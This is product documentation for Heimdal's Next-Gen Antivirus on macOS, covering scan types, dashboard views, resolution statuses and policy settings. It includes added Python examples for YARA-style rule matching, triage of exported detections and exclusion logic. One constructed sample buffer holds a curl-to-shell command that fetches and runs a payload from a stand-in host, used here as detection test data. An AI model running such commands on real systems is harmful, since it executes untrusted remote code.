In this article, you will learn everything you need to know about the Next-Gen Antivirus module.
1. Description
2. How does Next-Gen Antivirus work?
3. HEIMDAL Agent - Next-Gen Antivirus
4. Next-Gen Antivirus view
5. Next-Gen Antivirus settings
DESCRIPTION
Next-Gen Antivirus is the reactive protection side of our product suite. The Next-Gen Antivirus solution reacts to infected files found on the system. Next-Gen Antivirus combines the techniques known by both traditional and Next-Gen Antivirus to detect and remediate viruses, APTs, financial fraud, ransomware, and data leaks. It complements the DNS Security - Endpoint product to offer all-around protection. It offers a centralized management interface across all devices for easy corporate client management. It is flexible and easy to use, and it offers a wide variety of scanning profiles to fit your corporate needs.
Next-Gen Antivirus leverages Apple's built-in XProtect engine (enforcing the YARA rules for its signature-based detection capabilities) that provides a strong baseline of protection by scanning files at key moments - for example, when an app is downloaded or first executed. The YARA rules are composed of metadata (information about the rule), strings (specific patterns), and a condition (a logical expression that must be met for the file to be classified as a match). Additionally, XProtect does not include on-demand or scheduled scanning, as it was designed to be lightweight and event-driven, but our solution includes both on-demand and scheduled antivirus scans, allowing proactive system checks at any time. At this stage, Next-Gen Antivirus does not yet scan inside archived files (such as ZIPs or RARs).
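To make the three-part rule structure (metadata, strings, condition) concrete, here is an added example that is not Heimdal's or Apple's code and not a real XProtect rule: a minimal Python evaluator that parses one constructed YARA-style rule into its meta, strings and condition sections and evaluates the condition against a byte buffer. It supports only text and hex strings and the operators and, or, not, "any of them" and "all of them"; real YARA adds string modifiers, counts, offsets and modules. The rule name, the patterns and both sample buffers are constructed for illustration.

```python
import re
from typing import Dict, List, Tuple

# Constructed rule in YARA syntax for illustration only (not an XProtect rule).
SAMPLE_RULE = r'''
rule Example_Downloader
{
    meta:
        description = "constructed example rule"
        severity = "high"
    strings:
        $url   = "http://example.invalid/payload"
        $shell = "/bin/sh -c"
        $macho = { CF FA ED FE }
    condition:
        $url and ($shell or $macho)
}
'''

# Constructed sample buffers standing in for scanned file contents.
SAMPLE_SUSPECT = b"\xcf\xfa\xed\xfe\x07\x00\x00\x01curl http://example.invalid/payload | /bin/sh -c"
SAMPLE_BENIGN = b"release notes: see http://example.invalid/index.html for details"


def parse_rule(text: str) -> dict:
    """Split one rule into its name, meta pairs, string patterns and condition text."""
    name = re.search(r"rule\s+(\w+)", text).group(1)
    # The first '{' opens the rule body; the last '}' closes it (hex strings sit in between).
    body = text[text.index("{") + 1:text.rindex("}")]
    parts = re.split(r"\b(meta|strings|condition):", body)
    sections = {parts[i]: parts[i + 1] for i in range(1, len(parts) - 1, 2)}
    meta = dict(re.findall(r'(\w+)\s*=\s*"([^"]*)"', sections.get("meta", "")))
    strings: Dict[str, bytes] = {}
    pattern = r'(\$\w+)\s*=\s*(?:"([^"]*)"|\{([^}]*)\})'
    for ident, txt, hexs in re.findall(pattern, sections.get("strings", "")):
        # A text string becomes its UTF-8 bytes; a hex string becomes the raw bytes.
        strings[ident] = txt.encode() if txt else bytes.fromhex("".join(hexs.split()))
    return {"name": name, "meta": meta, "strings": strings,
            "condition": sections["condition"].strip()}


def eval_condition(cond: str, hits: Dict[str, bool]) -> bool:
    """Evaluate a boolean condition over string identifiers with a small recursive-descent parser."""
    toks: List[str] = re.findall(r"\$\w+|\(|\)|\w+", cond)
    pos = 0

    def peek():
        return toks[pos] if pos < len(toks) else None

    def take():
        nonlocal pos
        pos += 1
        return toks[pos - 1]

    def expr():                      # expr := term ('or' term)*
        v = term()
        while peek() == "or":
            take()
            r = term()
            v = v or r
        return v

    def term():                      # term := factor ('and' factor)*
        v = factor()
        while peek() == "and":
            take()
            r = factor()
            v = v and r
        return v

    def factor():                    # factor := 'not' factor | '(' expr ')' | $id | any/all of them
        tok = take()
        if tok == "not":
            return not factor()
        if tok == "(":
            v = expr()
            if take() != ")":
                raise ValueError("unbalanced parenthesis in condition")
            return v
        if tok in ("any", "all"):
            if take() != "of" or take() != "them":
                raise ValueError("expected 'of them'")
            return (any if tok == "any" else all)(hits.values())
        if tok.startswith("$"):
            return hits[tok]
        raise ValueError(f"unsupported condition token: {tok}")

    result = expr()
    if pos != len(toks):
        raise ValueError("trailing tokens in condition")
    return result


def scan_bytes(rule_text: str, data: bytes) -> Tuple[bool, List[str]]:
    """Return (rule matched?, sorted identifiers of the strings found in data)."""
    rule = parse_rule(rule_text)
    hits = {ident: pat in data for ident, pat in rule["strings"].items()}
    return eval_condition(rule["condition"], hits), sorted(i for i, h in hits.items() if h)


if __name__ == "__main__":
    for label, buf in (("suspect", SAMPLE_SUSPECT), ("benign", SAMPLE_BENIGN)):
        matched, found = scan_bytes(SAMPLE_RULE, buf)
        print(f"{label}: matched={matched} strings={found}")
```

The point the engine-side view makes is that a signature engine only classifies a file when the whole condition holds, so a single string hit (here the URL in the benign buffer is a different URL, and in a real case a lone shell string would be common) is not by itself a detection.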
HOW DOES NEXT-GEN ANTIVIRUS WORK?
As a standalone Antivirus product, the Next-Gen Antivirus features a complex threat scan module that is capable of detecting viruses, trojans, riskware, heuristic threats, adware, backdoors, constructors, dialers, exploits, trash, and APCs. Besides the scan module that is available on each HEIMDAL Agent installation, the Antivirus as a concept also features a reporting and control dashboard, a protection cloud, a local quarantine location, and VDFs (Virus Definition Files).
HEIMDAL AGENT - NEXT-GEN ANTIVIRUS
Endpoint Detection - Next-Gen Antivirus (inside the HEIMDAL Agent) allows the end-user to run a scan or to stop a scan operation (if allowed in the Group Policy settings), and it also displays information about the detected Infections and the Quarantined files.
The end-user who is allowed to start a scan operation can click on the Go To Scan button, where they can select a scan type from the following:
- Quick Scan - scans critical OS locations and the most common target folders that are known for virus activity: /System/Library/Extensions/, /System/Library/LaunchAgents, /System/Library/LaunchDaemons, /System/Library/StartupItems, /Library/Extensions, /Library/Internet Plug-Ins, /Library/LaunchAgents, /Library/LaunchDaemons, /Library/StartupItems, /Library/PrivilegedHelperTools, /Library/Preferences/loginwindow.plist, /Library/Preference/loginitems.plist, /Library/Preference/loginwindows.plist, /Users/*/Library/Internet Plug-Ins, /Users/*/Library/LaunchAgents.
- Active Processes Scan - scans all the processes currently running on the machine.
- Full Scan - scans all the local files on the computer.
- Hard Drive Scan - scans all files on the hard drive while ignoring the files on all external media types.
- Local Drive Scan - the profile will scan all local disks, including the hard drives, optical drives, and external storage.
- Removable Drive Scan - scans for the files that are on flash, optical, or external drives.
- System Scan - scans the system directory.
- Network Drive Scan - scans mapped network drives (does not work with network locations). The HEIMDAL Agent detects infected files, but no action is performed (Quarantine/Delete) because a file located on a network share cannot be moved to the local quarantine folder.
The Infected/Quarantined view displays a list of intercepted File names, the Threat type, Infection Name, Status, and Date.
NEXT-GEN ANTIVIRUS view
The Next-Gen Antivirus view displays all the information collected by the HEIMDAL Agent that is running on the endpoints in your organization. The collected information refers to the detected/quarantined files intercepted by the HEIMDAL Agent's Next-Gen Antivirus engine. On the top, you see a statistic regarding the number of Infected Files, the number of Suspicious Files, and the number of Quarantined Files.
The collected information is placed in the following views: Latest Infections, Infection Type, Hostname/Infections, Quarantine, Exclude, Scan History, and Zero-Trust Execution Protection.
- Latest Infections - This view displays a table with the latest detected infections and the following details: Hostname, Username, File, MD5, Threat Category, Infection Name, Status, Resolution, and Timestamp. This view allows you to select one or multiple infected files and add them to quarantine, delete them, or add them to storage.
- Infection Type - This view displays a table with the infection types and the following details: Threat Category, Number of Matches, Most Targeted Hostname, Username, and Last Match.
- Hostname/Infections - This view displays a table of infections per hostname and the following details: Hostname, Username, Highest Threat Category, Number of Matches, and Last Match.
- Quarantine - This view displays a table with all quarantined files and the following details: Hostname, Username, File, MD5, Threat Category, Infection Name, Status, Resolution, and Timestamp. This view allows you to select one or multiple quarantined files and remove them from quarantine or add them to storage. Quarantined files are kept for 90 days (this is the default value).
- Exclude - This view displays a table of all exclusions and the following details: Hostname, Username, File, MD5, Threat Category, Infection Name, Status, Resolution, and Timestamp.
- Scan History - This view displays a table with each computer that has performed scan operations (only the latest scan is displayed) and the following details: Hostname, Username, Group Policy, Timestamp, New Infections Found, and Resolution. This view allows you to select one or multiple endpoints and select a scan type (Quick Scan, Full Scan, Active Processes Scan, Hard Drive Scan, Local Drive Scan, Removable Drive Scan, System Scan, Network Drive Scan). The selected scan will start on the first Group Policy check performed by the HEIMDAL Agent on the selected endpoint.
The Download CSV functionality allows you to generate and download a CSV report that includes all the information in Standard or Verbose mode corresponding to each view.
The Filters functionality allows you to filter entries by Operating System.
The files listed in the Latest Infections view, Quarantine view, and Exclude view can get one of the following Resolution statuses:
None - no action is taken on the file.
Deleted - the file is deleted.
DeletePending - the file has been selected for deletion, and it will be deleted when the HEIMDAL Agent performs a GP check.
ErrorDelete - the file has been selected for deletion, but an error occurred (the file could be in use).
ErrorQuarantine - the file has been marked to be quarantined, but an error occurred (the file could be in use).
FNOEXIST - the file has been marked to be deleted or quarantined, but it does not exist at the path (it has been removed manually, or it was never allowed to be written to the disk). A file that is copied/extracted/downloaded (that is, written to disk) is intercepted in memory before being written and is NOT allowed to be written. Next-Gen Antivirus displays an infection event, but the file is not quarantined because it was blocked in memory.
Quarantined - the file has been quarantined. A file that has been quarantined will be automatically deleted after 30 days if it has not been restored.
QuarantinePending - the file has been marked to be quarantined, and this operation will take place on the next HEIMDAL Agent GP check.
DeleteQuarantinePending - the file has been selected for deletion, and this operation will be performed on the next HEIMDAL Agent GP check.
Excluded - the file has been excluded.
ExcludePending - the file has been marked to be excluded, and the operation will take place on the next HEIMDAL Agent GP check.
ExcludeQuarantinePending - the file has been marked to be excluded, and the operation will take place on the next HEIMDAL Agent GP check.
ErrorExcludeQuarantine - the file has been marked to be excluded, and an error occurred.
ErrorRemoveQuarantine - the file has been marked to be removed from the Quarantine list, and an error occurred (the file could have been deleted manually).
RemoveExclusionPending - the file has been marked to be excluded, and the operation will be performed on the next HEIMDAL Agent GP check.
RemoveQuarantinePending - the file has been marked to be removed from the Quarantine list, and the operation will be performed on the next HEIMDAL Agent GP check.
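The Resolution values above fall into three groups an analyst treats differently: final states, states waiting for the next Group Policy check, and errors that need follow-up. The following is an added Python example, not Heimdal's code, that runs that grouping over a constructed Latest Infections CSV export (the column names follow the view description above; the hostnames, users, paths, hash placeholders and infection names are made up, and the real export layout may differ) and lists the rows that need attention: failed actions, infected files with no action taken, and FNOEXIST entries for which no quarantine copy exists.

```python
import csv
import io
from collections import Counter
from typing import Dict, List, Tuple

# Resolution values as documented above, grouped by what an analyst does with them.
PENDING = {"DeletePending", "QuarantinePending", "DeleteQuarantinePending", "ExcludePending",
           "ExcludeQuarantinePending", "RemoveExclusionPending", "RemoveQuarantinePending"}
ERROR = {"ErrorDelete", "ErrorQuarantine", "ErrorExcludeQuarantine", "ErrorRemoveQuarantine"}
FINAL = {"None", "Deleted", "Quarantined", "Excluded", "FNOEXIST"}

# Constructed sample of a Latest Infections CSV export. Column names follow the view
# description above; hostnames, users, paths, hashes and infection names are made up.
SAMPLE_CSV = """\
Hostname,Username,File,MD5,Threat Category,Infection Name,Status,Resolution,Timestamp
mac-01,alice,/Users/alice/Downloads/invoice.pkg,md5-placeholder-1,Trojan,Example.Trojan.A,Infected,Quarantined,2024-05-01 09:12:00
mac-02,bob,/Users/bob/Downloads/setup.dmg,md5-placeholder-2,Adware,Example.Adware.B,Suspicious,ErrorQuarantine,2024-05-01 09:15:00
mac-03,carol,/Users/carol/Desktop/tool.zip,md5-placeholder-3,Riskware,Example.Riskware.C,Infected,DeletePending,2024-05-01 09:20:00
mac-01,alice,/Users/alice/Library/LaunchAgents/com.example.plist,md5-placeholder-4,Backdoor,Example.Backdoor.D,Infected,FNOEXIST,2024-05-01 09:22:00
mac-04,dave,/Users/dave/Downloads/old.exe,md5-placeholder-5,Trojan,Example.Trojan.E,Infected,None,2024-05-01 09:30:00
"""


def classify(resolution: str) -> str:
    """Map a Resolution value to pending / error / final / unknown."""
    if resolution in PENDING:
        return "pending"
    if resolution in ERROR:
        return "error"
    if resolution in FINAL:
        return "final"
    return "unknown"


def triage(csv_text: str) -> Tuple[Dict[str, int], List[Tuple[str, str, str, str]]]:
    """Count rows per class and list (hostname, file, resolution, note) rows that need follow-up."""
    rows = list(csv.DictReader(io.StringIO(csv_text)))
    counts = Counter(classify(r["Resolution"]) for r in rows)
    attention: List[Tuple[str, str, str, str]] = []
    for r in rows:
        res = r["Resolution"]
        if classify(res) == "error":
            note = "action failed; check the file on the host and re-issue the action"
        elif res == "None" and r["Status"] == "Infected":
            note = "detected but no action taken; check the Default Action setting in the Group Policy"
        elif res == "FNOEXIST":
            note = "blocked before it was written or removed manually; no quarantine copy exists"
        else:
            continue
        attention.append((r["Hostname"], r["File"], res, note))
    return dict(counts), attention


if __name__ == "__main__":
    counts, attention = triage(SAMPLE_CSV)
    print("per class:", counts)
    for host, path, res, note in attention:
        print(f"{host}: {path} [{res}] -> {note}")
```

Pending states are deliberately not listed for attention: they resolve on the next Group Policy check, so an entry that stays pending across several checks is the signal worth alerting on, which a scheduled run of this script over successive exports would surface.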
NEXT-GEN ANTIVIRUS settings
The Endpoint Detection - Next-Gen Antivirus will allow you or the users to perform scan operations on the endpoints in your environment to keep viruses and other threats away.
Next-Gen Antivirus - turns ON/OFF the Next-Gen Antivirus.
General Settings
Protection Cloud - enables/disables sending the file's digital fingerprint to our real-time protection cloud for further analysis; the cloud returns a fast response on whether the file is infected or safe.
Allow Manual Scan - enables/disables the ability of the end-user to start any scan directly from the HEIMDAL Agent.
Allow Cancel Scan - enables/disables the ability of the end-user to cancel any running or scheduled scan operation directly from the HEIMDAL Agent.
Default Action on detection of Infected files - can be set to Quarantine or Allow.
Default Action on detection of Suspicious files - can be set to Quarantine or Allow.
Update virus definitions interval [min] - allows you to set the update time interval for the virus definition files. The default value is 120 minutes, and it can be extended to 360 minutes. This feature is designed to check whether there are any new virus definition files (VDFs) available on the HEIMDAL servers. When a new VDF file is available, it will be automatically downloaded to the local agent database. It is recommended to have the limit set to 120 minutes to update the database as soon as possible.
Schedule Scan
This section allows you to schedule a scan according to your preferences. You can start creating a schedule by pressing the Add New Scan button.
Scan Profile Name - specify the name for the profile you want to create.
Scan Type - select the type of scan you wish HEIMDAL Next-Gen Antivirus to run in the created profile.
You can set up a scheduler to run the selected Scan Type in the specified timeframe. The scheduler enables you to choose a day or multiple days during the week or the month, and the time interval when to run the selected Scan Type.
The scheduler also allows users to opt for recurring schedules at the weekly level.
IMPORTANT
The scan profile does not apply automatically in the policy after clicking the Set Scan button. The configured scheduler needs to be confirmed by updating the policy. If the Update GP button is not clicked, the defined scan profile will be lost if the current page is left before updating the policy. Multiple scan profiles can be created inside a Group Policy. However, the scan type is exclusive. This means that it is not possible to create multiple profiles with the same scan type. For example, there cannot be 2 scan profiles to perform full scans in the same Group Policy.
Next-Gen Antivirus Exclusion List
This feature allows you to add exclusions, which are items that Next-Gen Antivirus will ignore when scanning. The Exclusion List comes with different Priorities and enables you to exclude file names, file paths, directories, or patterns (wildcards).
Types
Filename - allows you to specify the filename that you want to exclude (e.g., test.exe, file.doc, file.txt, example.msi).
File Path - allows you to specify the file path where the file is located on the hard drive (e.g., /Users/test/Downloads/test.pkg).
Directory - allows you to specify a directory path to be excluded from scanning (sub-directories are automatically excluded) (e.g., /Users/test/Downloads/).
Pattern - allows you to specify a pattern that should be excluded from scanning.
Global Quarantine List
The Global Quarantine List allows you to add a file to quarantine if it is detected by the Antivirus engine (the file will be marked as Suspicious or Infected).
A file that is added to the Global Quarantine List based on File Name can be quarantined ONLY if the Antivirus engine detects the file as Suspicious/Infected.
A file that is added to the Global Quarantine List based on the File Path can be quarantined regardless of whether the Antivirus engine detects it as Suspicious/Infected or not.
Files added by File Path will be marked as Suspicious.
.txt files added by File Path will not work with Real-Time Scanning.
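The interaction between the Exclusion List, the Global Quarantine List and the Default Action settings is easiest to see as one decision function. The following is an added Python example, not Heimdal's code: the entry kinds follow the Types above, but the matching semantics (exact filename, exact path, directory prefix, shell-style wildcard over the full path) and the order of checks (exclusions first, then the Global Quarantine List, then the Default Action) are my assumptions, and all policy entries and paths other than test.exe and /Users/test/Downloads/ are constructed. The trigger argument models the caveat above that a .txt entry added by File Path is not enforced by Real-Time Scanning.

```python
import fnmatch
import os
from dataclasses import dataclass, field
from typing import List, Tuple


@dataclass
class ListEntry:
    kind: str    # "filename" | "filepath" | "directory" | "pattern"
    value: str


@dataclass
class NgavPolicy:
    default_infected: str = "Quarantine"     # Default Action on detection of Infected files
    default_suspicious: str = "Quarantine"   # Default Action on detection of Suspicious files
    exclusions: List[ListEntry] = field(default_factory=list)
    global_quarantine: List[ListEntry] = field(default_factory=list)   # filename/filepath only


def matches(entry: ListEntry, path: str) -> bool:
    """Assumed matching semantics for each entry kind."""
    name = os.path.basename(path)
    if entry.kind == "filename":
        return name == entry.value
    if entry.kind == "filepath":
        return path == entry.value
    if entry.kind == "directory":
        return path.startswith(entry.value.rstrip("/") + "/")   # sub-directories included
    if entry.kind == "pattern":
        return fnmatch.fnmatch(path, entry.value)               # assumed: wildcard over the full path
    raise ValueError(f"unknown entry kind: {entry.kind}")


def decide(path: str, engine_verdict: str, policy: NgavPolicy,
           trigger: str = "realtime") -> Tuple[str, str]:
    """Return (action, reason). engine_verdict is Clean/Suspicious/Infected; trigger is realtime/ondemand."""
    detected = engine_verdict in ("Suspicious", "Infected")
    # 1. Exclusions win (assumed order).
    for ex in policy.exclusions:
        if matches(ex, path):
            return "allow", f"excluded by {ex.kind} entry {ex.value}"
    # 2. Global Quarantine List: by File Name only together with a detection, by File Path always.
    for gq in policy.global_quarantine:
        if gq.kind not in ("filename", "filepath") or not matches(gq, path):
            continue
        if gq.kind == "filename" and detected:
            return "quarantine", "Global Quarantine List (File Name) plus engine detection"
        if gq.kind == "filepath":
            if trigger == "realtime" and path.lower().endswith(".txt"):
                continue   # .txt File Path entries are not enforced by Real-Time Scanning
            return "quarantine", "Global Quarantine List (File Path); file is marked Suspicious"
    # 3. Default Action per verdict.
    if engine_verdict == "Infected":
        return policy.default_infected.lower(), "Default Action on detection of Infected files"
    if engine_verdict == "Suspicious":
        return policy.default_suspicious.lower(), "Default Action on detection of Suspicious files"
    return "allow", "no detection"


# Constructed policy: only test.exe and /Users/test/Downloads/ come from the page examples.
SAMPLE_POLICY = NgavPolicy(
    default_suspicious="Allow",
    exclusions=[ListEntry("filename", "test.exe"),
                ListEntry("directory", "/Users/test/Downloads/"),
                ListEntry("pattern", "*.tmp")],
    global_quarantine=[ListEntry("filename", "updater.sh"),
                       ListEntry("filepath", "/Users/test/Desktop/tool.bin"),
                       ListEntry("filepath", "/Users/test/Desktop/notes.txt")],
)


if __name__ == "__main__":
    cases = [("/Users/test/Downloads/test.pkg", "Infected", "realtime"),
             ("/Users/test/Desktop/updater.sh", "Clean", "realtime"),
             ("/Users/test/Desktop/updater.sh", "Suspicious", "realtime"),
             ("/Users/test/Desktop/tool.bin", "Clean", "realtime"),
             ("/Users/test/Desktop/notes.txt", "Clean", "realtime"),
             ("/Users/test/Desktop/notes.txt", "Clean", "ondemand"),
             ("/Users/test/Desktop/other.app", "Suspicious", "realtime")]
    for p, v, t in cases:
        print(p, v, t, "->", decide(p, v, SAMPLE_POLICY, t))
```

Two things the walkthrough makes visible that the setting descriptions alone do not: a directory exclusion silently overrides an Infected verdict for everything beneath it, so exclusions on user-writable locations such as Downloads deserve review, and setting the Suspicious default to Allow means a Global Quarantine entry by File Name is the only thing that will quarantine a suspicious file with that name.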